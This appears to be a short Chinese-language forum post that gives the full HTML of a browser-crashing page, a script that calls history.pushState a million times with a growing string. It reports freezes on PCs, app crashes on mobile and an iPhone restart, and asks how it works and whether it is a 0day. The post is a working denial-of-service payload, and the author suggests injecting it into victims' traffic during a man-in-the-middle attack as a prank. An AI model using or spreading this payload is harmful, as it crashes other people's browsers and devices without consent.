完整 HTML 代码如下
<html><body><script>var total=””;for (var i=0;i<1000000;i++){total= total+i.toString(); history.pushState(0,0,total);}</script></body></html>
接来下会发生什么?
点开以后,我的状态是这样的:
如果你是 PC 端用户,点开链接以后,电脑 CPU 内存极有可能一路狂飙直至浏览器崩溃卡死!
如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让 iPhone 重启,这一现象倒是没有出现。22:49 修正:iPhone 用 Safari 打开之后链接之后,手机注销重启了!…
思考
这是 Bug 还是 0day? 为什么会有这一现象?如何实现的?
有哪些比较有意思的利用姿势?(我先来个: 当在执行 MITM 中间人攻击的时候,可以注入这一段 js,来个恶搞整蛊。然后都懂的…)